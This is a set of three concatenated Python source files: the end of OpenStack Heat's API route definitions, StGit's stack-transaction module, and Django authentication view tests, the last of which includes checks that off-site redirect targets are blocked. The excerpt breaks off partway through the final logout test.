                        'method': 'GET'
                    }
                ])
        # Resources
        resources_resource = resources.create_resource(conf)
        stack_path = '/{tenant_id}/stacks/{stack_name}/{stack_id}'
        connect(controller=resources_resource, path_prefix=stack_path,
                routes=[
                    # Resource collection
                    {
                        'name': 'resource_index',
                        'url': '/resources',
                        'action': 'index',
                        'method': 'GET'
                    },
                    # Resource data
                    {
                        'name': 'resource_show',
                        'url': '/resources/{resource_name}',
                        'action': 'show',
                        'method': 'GET'
                    },
                    {
                        'name': 'resource_metadata_show',
                        'url': '/resources/{resource_name}/metadata',
                        'action': 'metadata',
                        'method': 'GET'
                    },
                    {
                        'name': 'resource_signal',
                        'url': '/resources/{resource_name}/signal',
                        'action': 'signal',
                        'method': 'POST'
                    },
                    {
                        'name': 'resource_mark_unhealthy',
                        'url': '/resources/{resource_name}',
                        'action': 'mark_unhealthy',
                        'method': 'PATCH'
                    }
                ])
        # Events
        events_resource = events.create_resource(conf)
        connect(controller=events_resource, path_prefix=stack_path,
                routes=[
                    # Stack event collection
                    {
                        'name': 'event_index_stack',
                        'url': '/events',
                        'action': 'index',
                        'method': 'GET'
                    },
                    # Resource event collection
                    {
                        'name': 'event_index_resource',
                        'url': '/resources/{resource_name}/events',
                        'action': 'index',
                        'method': 'GET'
                    },
                    # Event data
                    {
                        'name': 'event_show',
                        'url': '/resources/{resource_name}/events/{event_id}',
                        'action': 'show',
                        'method': 'GET'
                    }
                ])
        # Actions
        actions_resource = actions.create_resource(conf)
        connect(controller=actions_resource, path_prefix=stack_path,
                routes=[
                    {
                        'name': 'action_stack',
                        'url': '/actions',
                        'action': 'action',
                        'method': 'POST'
                    }
                ])
        # Info
        info_resource = build_info.create_resource(conf)
        connect(controller=info_resource, path_prefix='/{tenant_id}',
                routes=[
                    {
                        'name': 'build_info',
                        'url': '/build_info',
                        'action': 'build_info',
                        'method': 'GET'
                    }
                ])
        # Software configs
        software_config_resource = software_configs.create_resource(conf)
        connect(controller=software_config_resource,
                path_prefix='/{tenant_id}/software_configs',
                routes=[
                    {
                        'name': 'software_config_index',
                        'url': '',
                        'action': 'index',
                        'method': 'GET'
                    },
                    {
                        'name': 'software_config_create',
                        'url': '',
                        'action': 'create',
                        'method': 'POST'
                    },
                    {
                        'name': 'software_config_show',
                        'url': '/{config_id}',
                        'action': 'show',
                        'method': 'GET'
                    },
                    {
                        'name': 'software_config_delete',
                        'url': '/{config_id}',
                        'action': 'delete',
                        'method': 'DELETE'
                    }
                ])
        # Software deployments
        sd_resource = software_deployments.create_resource(conf)
        connect(controller=sd_resource,
                path_prefix='/{tenant_id}/software_deployments',
                routes=[
                    {
                        'name': 'software_deployment_index',
                        'url': '',
                        'action': 'index',
                        'method': 'GET'
                    },
                    {
                        'name': 'software_deployment_metadata',
                        'url': '/metadata/{server_id}',
                        'action': 'metadata',
                        'method': 'GET'
                    },
                    {
                        'name': 'software_deployment_create',
                        'url': '',
                        'action': 'create',
                        'method': 'POST'
                    },
                    {
                        'name': 'software_deployment_show',
                        'url': '/{deployment_id}',
                        'action': 'show',
                        'method': 'GET'
                    },
                    {
                        'name': 'software_deployment_update',
                        'url': '/{deployment_id}',
                        'action': 'update',
                        'method': 'PUT'
                    },
                    {
                        'name': 'software_deployment_delete',
                        'url': '/{deployment_id}',
                        'action': 'delete',
                        'method': 'DELETE'
                    }
                ])
        # Services
        service_resource = services.create_resource(conf)
        with mapper.submapper(
            controller=service_resource,
            path_prefix='/{tenant_id}/services'
        ) as sa_mapper:
            sa_mapper.connect("service_index",
                              "",
                              action="index",
                              conditions={'method': 'GET'})
        # now that all the routes are defined, hand the populated mapper
        # to the base Router, which dispatches incoming requests through it
        super(API, self).__init__(mapper)
|
jasondunsmore/heat
|
heat/api/openstack/v1/__init__.py
|
Python
|
apache-2.0
| 18,979
|
"""The L{StackTransaction} class makes it possible to make complex
updates to an StGit stack in a safe and convenient way."""
import atexit
import itertools as it
from stgit import exception, utils
from stgit.utils import any, all
from stgit.out import *
from stgit.lib import git, log
from stgit.config import config
class TransactionException(exception.StgException):
    """Exception raised when something goes wrong with a
    L{StackTransaction}; raised e.g. when the transaction must be
    aborted with all changes rolled back."""
class TransactionHalted(TransactionException):
    """Exception raised when a L{StackTransaction} stops part-way through.
    Used to make a non-local jump from the transaction setup to the
    part of the transaction code where the transaction is run."""
def _print_current_patch(old_applied, new_applied):
    """Report the new topmost patch iff it changed between the two states."""
    old_top = old_applied[-1] if old_applied else None
    new_top = new_applied[-1] if new_applied else None
    if old_top == new_top:
        # Topmost patch unchanged (including the "no patches" case): silence.
        return
    if new_top is None:
        out.info('No patch applied')
    else:
        out.info('Now at patch "%s"' % new_top)
class _TransPatchMap(dict):
"""Maps patch names to sha1 strings."""
def __init__(self, stack):
dict.__init__(self)
self.__stack = stack
def __getitem__(self, pn):
try:
return dict.__getitem__(self, pn)
except KeyError:
return self.__stack.patches.get(pn).commit
class StackTransaction(object):
"""A stack transaction, used for making complex updates to an StGit
stack in one single operation that will either succeed or fail
cleanly.
The basic theory of operation is the following:
1. Create a transaction object.
2. Inside a::
try
...
except TransactionHalted:
pass
block, update the transaction with e.g. methods like
L{pop_patches} and L{push_patch}. This may create new git
objects such as commits, but will not write any refs; this means
that in case of a fatal error we can just walk away, no clean-up
required.
(Some operations may need to touch your index and working tree,
though. But they are cleaned up when needed.)
3. After the C{try} block -- wheher or not the setup ran to
completion or halted part-way through by raising a
L{TransactionHalted} exception -- call the transaction's L{run}
method. This will either succeed in writing the updated state to
your refs and index+worktree, or fail without having done
anything."""
def __init__(self, stack, msg, discard_changes = False,
allow_conflicts = False, allow_bad_head = False,
check_clean_iw = None):
"""Create a new L{StackTransaction}.
@param discard_changes: Discard any changes in index+worktree
@type discard_changes: bool
@param allow_conflicts: Whether to allow pre-existing conflicts
@type allow_conflicts: bool or function of L{StackTransaction}"""
self.__stack = stack
self.__msg = msg
self.__patches = _TransPatchMap(stack)
self.__applied = list(self.__stack.patchorder.applied)
self.__unapplied = list(self.__stack.patchorder.unapplied)
self.__hidden = list(self.__stack.patchorder.hidden)
self.__conflicting_push = None
self.__error = None
self.__current_tree = self.__stack.head.data.tree
self.__base = self.__stack.base
self.__discard_changes = discard_changes
self.__bad_head = None
self.__conflicts = None
if isinstance(allow_conflicts, bool):
self.__allow_conflicts = lambda trans: allow_conflicts
else:
self.__allow_conflicts = allow_conflicts
self.__temp_index = self.temp_index_tree = None
if not allow_bad_head:
self.__assert_head_top_equal()
if check_clean_iw:
self.__assert_index_worktree_clean(check_clean_iw)
stack = property(lambda self: self.__stack)
patches = property(lambda self: self.__patches)
def __set_applied(self, val):
self.__applied = list(val)
applied = property(lambda self: self.__applied, __set_applied)
def __set_unapplied(self, val):
self.__unapplied = list(val)
unapplied = property(lambda self: self.__unapplied, __set_unapplied)
def __set_hidden(self, val):
self.__hidden = list(val)
hidden = property(lambda self: self.__hidden, __set_hidden)
all_patches = property(lambda self: (self.__applied + self.__unapplied
+ self.__hidden))
def __set_base(self, val):
assert (not self.__applied
or self.patches[self.applied[0]].data.parent == val)
self.__base = val
base = property(lambda self: self.__base, __set_base)
@property
def temp_index(self):
if not self.__temp_index:
self.__temp_index = self.__stack.repository.temp_index()
atexit.register(self.__temp_index.delete)
return self.__temp_index
@property
def top(self):
if self.__applied:
return self.__patches[self.__applied[-1]]
else:
return self.__base
def __get_head(self):
if self.__bad_head:
return self.__bad_head
else:
return self.top
def __set_head(self, val):
self.__bad_head = val
head = property(__get_head, __set_head)
def __assert_head_top_equal(self):
if not self.__stack.head_top_equal():
out.error(
'HEAD and top are not the same.',
'This can happen if you modify a branch with git.',
'"stg repair --help" explains more about what to do next.')
self.__abort()
def __assert_index_worktree_clean(self, iw):
if not iw.worktree_clean():
self.__halt('Worktree not clean. Use "refresh" or "status --reset"')
if not iw.index.is_clean(self.stack.head):
self.__halt('Index not clean. Use "refresh" or "status --reset"')
def __checkout(self, tree, iw, allow_bad_head):
if not allow_bad_head:
self.__assert_head_top_equal()
if self.__current_tree == tree and not self.__discard_changes:
# No tree change, but we still want to make sure that
# there are no unresolved conflicts. Conflicts
# conceptually "belong" to the topmost patch, and just
# carrying them along to another patch is confusing.
if (self.__allow_conflicts(self) or iw == None
or not iw.index.conflicts()):
return
out.error('Need to resolve conflicts first')
self.__abort()
assert iw != None
if self.__discard_changes:
iw.checkout_hard(tree)
else:
iw.checkout(self.__current_tree, tree)
self.__current_tree = tree
@staticmethod
def __abort():
raise TransactionException(
'Command aborted (all changes rolled back)')
def __check_consistency(self):
remaining = set(self.all_patches)
for pn, commit in self.__patches.iteritems():
if commit == None:
assert self.__stack.patches.exists(pn)
else:
assert pn in remaining
def abort(self, iw = None):
# The only state we need to restore is index+worktree.
if iw:
self.__checkout(self.__stack.head.data.tree, iw,
allow_bad_head = True)
def run(self, iw = None, set_head = True, allow_bad_head = False,
print_current_patch = True):
"""Execute the transaction. Will either succeed, or fail (with an
exception) and do nothing."""
self.__check_consistency()
log.log_external_mods(self.__stack)
new_head = self.head
# Set branch head.
if set_head:
if iw:
try:
self.__checkout(new_head.data.tree, iw, allow_bad_head)
except git.CheckoutException:
# We have to abort the transaction.
self.abort(iw)
self.__abort()
self.__stack.set_head(new_head, self.__msg)
if self.__error:
if self.__conflicts:
out.error(*([self.__error] + self.__conflicts))
else:
out.error(self.__error)
# Write patches.
def write(msg):
for pn, commit in self.__patches.iteritems():
if self.__stack.patches.exists(pn):
p = self.__stack.patches.get(pn)
if commit == None:
p.delete()
else:
p.set_commit(commit, msg)
else:
self.__stack.patches.new(pn, commit, msg)
self.__stack.patchorder.applied = self.__applied
self.__stack.patchorder.unapplied = self.__unapplied
self.__stack.patchorder.hidden = self.__hidden
log.log_entry(self.__stack, msg)
old_applied = self.__stack.patchorder.applied
write(self.__msg)
if self.__conflicting_push != None:
self.__patches = _TransPatchMap(self.__stack)
self.__conflicting_push()
write(self.__msg + ' (CONFLICT)')
if print_current_patch:
_print_current_patch(old_applied, self.__applied)
if self.__error:
return utils.STGIT_CONFLICT
else:
return utils.STGIT_SUCCESS
def __halt(self, msg):
self.__error = msg
raise TransactionHalted(msg)
@staticmethod
def __print_popped(popped):
if len(popped) == 0:
pass
elif len(popped) == 1:
out.info('Popped %s' % popped[0])
else:
out.info('Popped %s -- %s' % (popped[-1], popped[0]))
def pop_patches(self, p):
"""Pop all patches pn for which p(pn) is true. Return the list of
other patches that had to be popped to accomplish this. Always
succeeds."""
popped = []
for i in xrange(len(self.applied)):
if p(self.applied[i]):
popped = self.applied[i:]
del self.applied[i:]
break
popped1 = [pn for pn in popped if not p(pn)]
popped2 = [pn for pn in popped if p(pn)]
self.unapplied = popped1 + popped2 + self.unapplied
self.__print_popped(popped)
return popped1
def delete_patches(self, p, quiet = False):
"""Delete all patches pn for which p(pn) is true. Return the list of
other patches that had to be popped to accomplish this. Always
succeeds."""
popped = []
all_patches = self.applied + self.unapplied + self.hidden
for i in xrange(len(self.applied)):
if p(self.applied[i]):
popped = self.applied[i:]
del self.applied[i:]
break
popped = [pn for pn in popped if not p(pn)]
self.unapplied = popped + [pn for pn in self.unapplied if not p(pn)]
self.hidden = [pn for pn in self.hidden if not p(pn)]
self.__print_popped(popped)
for pn in all_patches:
if p(pn):
s = ['', ' (empty)'][self.patches[pn].data.is_nochange()]
self.patches[pn] = None
if not quiet:
out.info('Deleted %s%s' % (pn, s))
return popped
def push_patch(self, pn, iw = None, allow_interactive = False,
               already_merged = False):
    """Attempt to push the named patch. If this results in conflicts,
    halts the transaction. If index+worktree are given, spill any
    conflicts to them."""
    out.start('Pushing patch "%s"' % pn)
    orig_cd = self.patches[pn].data
    cd = orig_cd.set_committer(None)
    oldparent = cd.parent
    # Rebase the patch commit onto the current stack top.
    cd = cd.set_parent(self.top)
    if already_merged:
        # the resulting patch is empty
        tree = cd.parent.data.tree
    else:
        # Try a three-way merge entirely inside the temporary index.
        base = oldparent.data.tree
        ours = cd.parent.data.tree
        theirs = cd.tree
        tree, self.temp_index_tree = self.temp_index.merge(
            base, ours, theirs, self.temp_index_tree)
    s = ''
    merge_conflict = False
    if not tree:
        # The in-index merge failed; without a worktree to spill
        # conflicts into we have to give up.
        if iw == None:
            self.__halt('%s does not apply cleanly' % pn)
        try:
            self.__checkout(ours, iw, allow_bad_head = False)
        except git.CheckoutException:
            self.__halt('Index/worktree dirty')
        try:
            interactive = (allow_interactive and
                           config.get('stgit.autoimerge') == 'yes')
            iw.merge(base, ours, theirs, interactive = interactive)
            tree = iw.index.write_tree()
            self.__current_tree = tree
            s = 'modified'
        except git.MergeConflictException, e:
            # Leave the conflict markers in the worktree; record the
            # conflicting paths and keep "ours" as the committed tree.
            tree = ours
            merge_conflict = True
            self.__conflicts = e.conflicts
            s = 'conflict'
        except git.MergeException, e:
            self.__halt(str(e))
    cd = cd.set_tree(tree)
    # Re-commit only if anything recorded in the patch actually changed.
    if any(getattr(cd, a) != getattr(orig_cd, a) for a in
           ['parent', 'tree', 'author', 'message']):
        comm = self.__stack.repository.commit(cd)
        if merge_conflict:
            # When we produce a conflict, we'll run the update()
            # function defined below _after_ having done the
            # checkout in run(). To make sure that we check out
            # the real stack top (as it will look after update()
            # has been run), set it hard here.
            self.head = comm
    else:
        comm = None
        s = 'unmodified'
    if already_merged:
        s = 'merged'
    elif not merge_conflict and cd.is_nochange():
        s = 'empty'
    out.done(s)
    def update():
        # Move pn from hidden/unapplied onto applied, with its new commit.
        if comm:
            self.patches[pn] = comm
        if pn in self.hidden:
            x = self.hidden
        else:
            x = self.unapplied
        del x[x.index(pn)]
        self.applied.append(pn)
    if merge_conflict:
        # We've just caused conflicts, so we must allow them in
        # the final checkout.
        self.__allow_conflicts = lambda trans: True
        # Save this update so that we can run it a little later.
        self.__conflicting_push = update
        self.__halt("%d merge conflict(s)" % len(self.__conflicts))
    else:
        # Update immediately.
        update()
def push_tree(self, pn):
    """Push the named patch without updating its tree."""
    orig_cd = self.patches[pn].data
    # Rebase onto the current top, clearing the committer for re-commit.
    cd = orig_cd.set_committer(None).set_parent(self.top)
    s = ''
    # Re-commit only if some recorded field actually changed.
    if any(getattr(cd, a) != getattr(orig_cd, a) for a in
           ['parent', 'tree', 'author', 'message']):
        self.patches[pn] = self.__stack.repository.commit(cd)
    else:
        s = ' (unmodified)'
    if cd.is_nochange():
        s = ' (empty)'
    out.info('Pushed %s%s' % (pn, s))
    # Move pn from hidden/unapplied onto the applied list.
    if pn in self.hidden:
        x = self.hidden
    else:
        x = self.unapplied
    del x[x.index(pn)]
    self.applied.append(pn)
def reorder_patches(self, applied, unapplied, hidden = None, iw = None):
    """Push and pop patches to attain the given ordering."""
    if hidden is None:
        hidden = self.hidden
    # Length of the common prefix of the current and requested applied
    # lists; only patches beyond it need to be popped and re-pushed.
    common = len(list(it.takewhile(lambda (a, b): a == b,
                                   zip(self.applied, applied))))
    to_pop = set(self.applied[common:])
    self.pop_patches(lambda pn: pn in to_pop)
    for pn in applied[common:]:
        self.push_patch(pn, iw)
    # Sanity checks: the ordering we were asked for must now hold.
    assert self.applied == applied
    assert set(self.unapplied + self.hidden) == set(unapplied + hidden)
    self.unapplied = unapplied
    self.hidden = hidden
def check_merged(self, patches):
    """Return a subset of patches already merged."""
    out.start('Checking for patches merged upstream')
    merged = []
    # Make the temporary index mirror the current stack head first.
    if self.temp_index_tree != self.stack.head.data.tree:
        self.temp_index.read_tree(self.stack.head.data.tree)
        self.temp_index_tree = self.stack.head.data.tree
    for pn in reversed(patches):
        # check whether patch changes can be reversed in the current index
        cd = self.patches[pn].data
        if cd.is_nochange():
            # Empty patches carry no changes, so "merged" is meaningless.
            continue
        try:
            self.temp_index.apply_treediff(cd.tree, cd.parent.data.tree,
                                           quiet = True)
            merged.append(pn)
            # The self.temp_index was modified by apply_treediff() so
            # force read_tree() the next time merge() is used.
            self.temp_index_tree = None
        except git.MergeException:
            pass
    out.done('%d found' % len(merged))
    return merged
|
miracle2k/stgit
|
stgit/lib/transaction.py
|
Python
|
gpl-2.0
| 17,358
|
from __future__ import with_statement
import os
import re
import urllib
from django.conf import settings
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.sites.models import Site, RequestSite
from django.contrib.auth.models import User
from django.test import TestCase
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import QueryDict
class AuthViewsTestCase(TestCase):
    """
    Helper base class for all the follow test cases.
    """
    fixtures = ['authtestdata.json']
    urls = 'django.contrib.auth.tests.urls'

    def setUp(self):
        # Pin language and template lookup to known values for each test,
        # remembering the originals so tearDown() can restore them.
        self.old_LANGUAGES = settings.LANGUAGES
        self.old_LANGUAGE_CODE = settings.LANGUAGE_CODE
        self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
        settings.LANGUAGES = (('en', 'English'),)
        settings.LANGUAGE_CODE = 'en'
        settings.TEMPLATE_DIRS = (
            os.path.join(os.path.dirname(__file__), 'templates'),
        )

    def tearDown(self):
        # Undo the settings overrides made in setUp().
        settings.LANGUAGES = self.old_LANGUAGES
        settings.LANGUAGE_CODE = self.old_LANGUAGE_CODE
        settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS

    def login(self, password='password'):
        """Log the fixture user in; assert the redirect and session key."""
        credentials = {'username': 'testclient', 'password': password}
        response = self.client.post('/login/', credentials)
        self.assertEqual(response.status_code, 302)
        self.assertTrue(
            response['Location'].endswith(settings.LOGIN_REDIRECT_URL))
        self.assertTrue(SESSION_KEY in self.client.session)
class PasswordResetTest(AuthViewsTestCase):
    """Tests for the password reset flow: request form, email, confirm link."""

    def test_email_not_found(self):
        "Error is raised if the provided email address isn't currently registered"
        response = self.client.get('/password_reset/')
        self.assertEqual(response.status_code, 200)
        response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
        self.assertContains(response, "That e-mail address doesn't have an associated user account")
        self.assertEqual(len(mail.outbox), 0)

    def test_email_found(self):
        "Email is sent if a valid email address is provided for password reset"
        response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        self.assertTrue("http://" in mail.outbox[0].body)
        self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)

    def test_email_found_custom_from(self):
        "Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
        response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)

    def _test_confirm_start(self):
        # Start by creating the email
        response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        return self._read_signup_email(mail.outbox[0])

    def _read_signup_email(self, email):
        """Extract the reset URL from *email*; return (full URL, path part)."""
        urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
        self.assertTrue(urlmatch is not None, "No URL found in sent email")
        return urlmatch.group(), urlmatch.groups()[0]

    def test_confirm_valid(self):
        url, path = self._test_confirm_start()
        response = self.client.get(path)
        # redirect to a 'complete' page:
        self.assertEqual(response.status_code, 200)
        self.assertTrue("Please enter your new password" in response.content)

    def test_confirm_invalid(self):
        url, path = self._test_confirm_start()
        # Let's munge the token in the path, but keep the same length,
        # in case the URLconf will reject a different length.
        path = path[:-5] + ("0"*4) + path[-1]
        response = self.client.get(path)
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The password reset link was invalid" in response.content)

    def test_confirm_invalid_user(self):
        # Ensure that we get a 200 response for a non-existant user, not a 404
        response = self.client.get('/reset/123456-1-1/')
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The password reset link was invalid" in response.content)

    def test_confirm_overflow_user(self):
        # Ensure that we get a 200 response for a base36 user id that overflows int
        response = self.client.get('/reset/zzzzzzzzzzzzz-1-1/')
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The password reset link was invalid" in response.content)

    def test_confirm_invalid_post(self):
        # Same as test_confirm_invalid, but trying
        # to do a POST instead.
        url, path = self._test_confirm_start()
        path = path[:-5] + ("0"*4) + path[-1]
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2':' anewpassword'})
        # Check the password has not been changed
        u = User.objects.get(email='staffmember@example.com')
        self.assertTrue(not u.check_password("anewpassword"))

    def test_confirm_complete(self):
        url, path = self._test_confirm_start()
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'anewpassword'})
        # It redirects us to a 'complete' page:
        self.assertEqual(response.status_code, 302)
        # Check the password has been changed
        u = User.objects.get(email='staffmember@example.com')
        self.assertTrue(u.check_password("anewpassword"))
        # Check we can't use the link again
        response = self.client.get(path)
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The password reset link was invalid" in response.content)

    def test_confirm_different_passwords(self):
        url, path = self._test_confirm_start()
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2':' x'})
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The two password fields didn't match" in response.content)
class ChangePasswordTest(AuthViewsTestCase):
    """Tests for the password_change view and its done-page redirect."""

    def fail_login(self, password='password'):
        """Post a login that must fail, and verify the error message."""
        response = self.client.post('/login/', {
            'username': 'testclient',
            'password': password,
        })
        self.assertEqual(response.status_code, 200)
        self.assertTrue("Please enter a correct username and password. Note that both fields are case-sensitive." in response.content)

    def logout(self):
        """Log the test client out; only the session side effect matters."""
        # Fixed: the response was previously bound to an unused local.
        self.client.get('/logout/')

    def test_password_change_fails_with_invalid_old_password(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'donuts',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 200)
        self.assertTrue("Your old password was entered incorrectly. Please enter it again." in response.content)

    def test_password_change_fails_with_mismatched_passwords(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'donuts',
        })
        self.assertEqual(response.status_code, 200)
        self.assertTrue("The two password fields didn't match." in response.content)

    def test_password_change_succeeds(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/password_change/done/'))
        # The old password must no longer work, and the new one must.
        self.fail_login()
        self.login(password='password1')

    def test_password_change_done_succeeds(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/password_change/done/'))

    def test_password_change_done_fails(self):
        with self.settings(LOGIN_URL='/login/'):
            response = self.client.get('/password_change/done/')
            self.assertEqual(response.status_code, 302)
            self.assertTrue(response['Location'].endswith('/login/?next=/password_change/done/'))
class LoginTest(AuthViewsTestCase):
    """Tests for the login view: template context and redirect safety."""

    def test_current_site_in_context_after_login(self):
        response = self.client.get(reverse('django.contrib.auth.views.login'))
        self.assertEqual(response.status_code, 200)
        if Site._meta.installed:
            site = Site.objects.get_current()
            self.assertEqual(response.context['site'], site)
            self.assertEqual(response.context['site_name'], site.name)
        else:
            # Without the sites framework a RequestSite stand-in is used.
            self.assertIsInstance(response.context['site'], RequestSite)
        self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
                        'Login form is not an AuthenticationForm')

    def test_security_check(self, password='password'):
        login_url = reverse('django.contrib.auth.views.login')

        # Those URLs should not pass the security check
        for bad_url in ('http://example.com',
                        'https://example.com',
                        'ftp://exampel.com',
                        '//example.com'):
            nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
                'url': login_url,
                'next': REDIRECT_FIELD_NAME,
                'bad_url': urllib.quote(bad_url)
            }
            response = self.client.post(nasty_url, {
                'username': 'testclient',
                'password': password,
            }
            )
            self.assertEqual(response.status_code, 302)
            # An off-site "next" must never leak into the redirect target.
            self.assertFalse(bad_url in response['Location'],
                             "%s should be blocked" % bad_url)

        # These URLs *should* still pass the security check
        for good_url in ('/view/?param=http://example.com',
                         '/view/?param=https://example.com',
                         '/view?param=ftp://exampel.com',
                         'view/?param=//example.com',
                         'https:///',
                         '//testserver/',
                         '/url%20with%20spaces/', # see ticket #12534
                         ):
            safe_url = '%(url)s?%(next)s=%(good_url)s' % {
                'url': login_url,
                'next': REDIRECT_FIELD_NAME,
                'good_url': urllib.quote(good_url)
            }
            response = self.client.post(safe_url, {
                'username': 'testclient',
                'password': password,
            }
            )
            self.assertEqual(response.status_code, 302)
            self.assertTrue(good_url in response['Location'],
                            "%s should be allowed" % good_url)
class LoginURLSettings(AuthViewsTestCase):
    """Tests for how LOGIN_URL shapes redirects from login_required views."""
    urls = 'django.contrib.auth.tests.urls'

    def setUp(self):
        super(LoginURLSettings, self).setUp()
        # Remember LOGIN_URL so each test can override it freely.
        self.old_LOGIN_URL = settings.LOGIN_URL

    def tearDown(self):
        super(LoginURLSettings, self).tearDown()
        settings.LOGIN_URL = self.old_LOGIN_URL

    def get_login_required_url(self, login_url):
        """Set LOGIN_URL, hit a protected view, return the redirect target."""
        settings.LOGIN_URL = login_url
        response = self.client.get('/login_required/')
        self.assertEqual(response.status_code, 302)
        return response['Location']

    # NOTE: urlencode('/') passes '/' as the "safe" characters, so slashes
    # in the next parameter are not percent-encoded.
    def test_standard_login_url(self):
        login_url = '/login/'
        login_required_url = self.get_login_required_url(login_url)
        querystring = QueryDict('', mutable=True)
        querystring['next'] = '/login_required/'
        self.assertEqual(login_required_url,
                         'http://testserver%s?%s' % (login_url, querystring.urlencode('/')))

    def test_remote_login_url(self):
        login_url = 'http://remote.example.com/login'
        login_required_url = self.get_login_required_url(login_url)
        querystring = QueryDict('', mutable=True)
        querystring['next'] = 'http://testserver/login_required/'
        self.assertEqual(login_required_url,
                         '%s?%s' % (login_url, querystring.urlencode('/')))

    def test_https_login_url(self):
        login_url = 'https:///login/'
        login_required_url = self.get_login_required_url(login_url)
        querystring = QueryDict('', mutable=True)
        querystring['next'] = 'http://testserver/login_required/'
        self.assertEqual(login_required_url,
                         '%s?%s' % (login_url, querystring.urlencode('/')))

    def test_login_url_with_querystring(self):
        login_url = '/login/?pretty=1'
        login_required_url = self.get_login_required_url(login_url)
        querystring = QueryDict('pretty=1', mutable=True)
        querystring['next'] = '/login_required/'
        self.assertEqual(login_required_url, 'http://testserver/login/?%s' %
                         querystring.urlencode('/'))

    def test_remote_login_url_with_next_querystring(self):
        login_url = 'http://remote.example.com/login/'
        login_required_url = self.get_login_required_url('%s?next=/default/' %
                                                         login_url)
        querystring = QueryDict('', mutable=True)
        querystring['next'] = 'http://testserver/login_required/'
        self.assertEqual(login_required_url, '%s?%s' % (login_url,
                                                        querystring.urlencode('/')))
class LogoutTest(AuthViewsTestCase):
    """Tests for the logout view: templates, redirects and redirect safety."""
    urls = 'django.contrib.auth.tests.urls'

    def confirm_logged_out(self):
        # After logout the session must not carry an authenticated user key.
        self.assertTrue(SESSION_KEY not in self.client.session)

    def test_logout_default(self):
        "Logout without next_page option renders the default template"
        self.login()
        response = self.client.get('/logout/')
        self.assertEqual(200, response.status_code)
        self.assertTrue('Logged out' in response.content)
        self.confirm_logged_out()

    def test_14377(self):
        # Bug 14377
        self.login()
        response = self.client.get('/logout/')
        self.assertTrue('site' in response.context)

    def test_logout_with_overridden_redirect_url(self):
        # Bug 11223
        self.login()
        response = self.client.get('/logout/next_page/')
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/somewhere/'))

        # A ?next= query string takes precedence over the view's next_page.
        response = self.client.get('/logout/next_page/?next=/login/')
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/login/'))

        self.confirm_logged_out()

    def test_logout_with_next_page_specified(self):
        "Logout with next_page option given redirects to specified resource"
        self.login()
        response = self.client.get('/logout/next_page/')
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/somewhere/'))
        self.confirm_logged_out()

    def test_logout_with_redirect_argument(self):
        "Logout with query string redirects to specified resource"
        self.login()
        response = self.client.get('/logout/?next=/login/')
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/login/'))
        self.confirm_logged_out()

    def test_logout_with_custom_redirect_argument(self):
        "Logout with custom query string redirects to specified resource"
        self.login()
        response = self.client.get('/logout/custom_query/?follow=/somewhere/')
        self.assertEqual(response.status_code, 302)
        self.assertTrue(response['Location'].endswith('/somewhere/'))
        self.confirm_logged_out()

    def test_security_check(self, password='password'):
        logout_url = reverse('django.contrib.auth.views.logout')

        # Those URLs should not pass the security check
        for bad_url in ('http://example.com',
                        'https://example.com',
                        'ftp://exampel.com',
                        '//example.com'
                        ):
            nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
                'url': logout_url,
                'next': REDIRECT_FIELD_NAME,
                'bad_url': urllib.quote(bad_url)
            }
            self.login()
            response = self.client.get(nasty_url)
            self.assertEqual(response.status_code, 302)
            # An off-site "next" must never leak into the redirect target.
            self.assertFalse(bad_url in response['Location'],
                             "%s should be blocked" % bad_url)
            self.confirm_logged_out()

        # These URLs *should* still pass the security check
        for good_url in ('/view/?param=http://example.com',
                         '/view/?param=https://example.com',
                         '/view?param=ftp://exampel.com',
                         'view/?param=//example.com',
                         'https:///',
                         '//testserver/',
                         '/url%20with%20spaces/', # see ticket #12534
                         ):
            safe_url = '%(url)s?%(next)s=%(good_url)s' % {
                'url': logout_url,
                'next': REDIRECT_FIELD_NAME,
                'good_url': urllib.quote(good_url)
            }
            self.login()
            response = self.client.get(safe_url)
            self.assertEqual(response.status_code, 302)
            self.assertTrue(good_url in response['Location'],
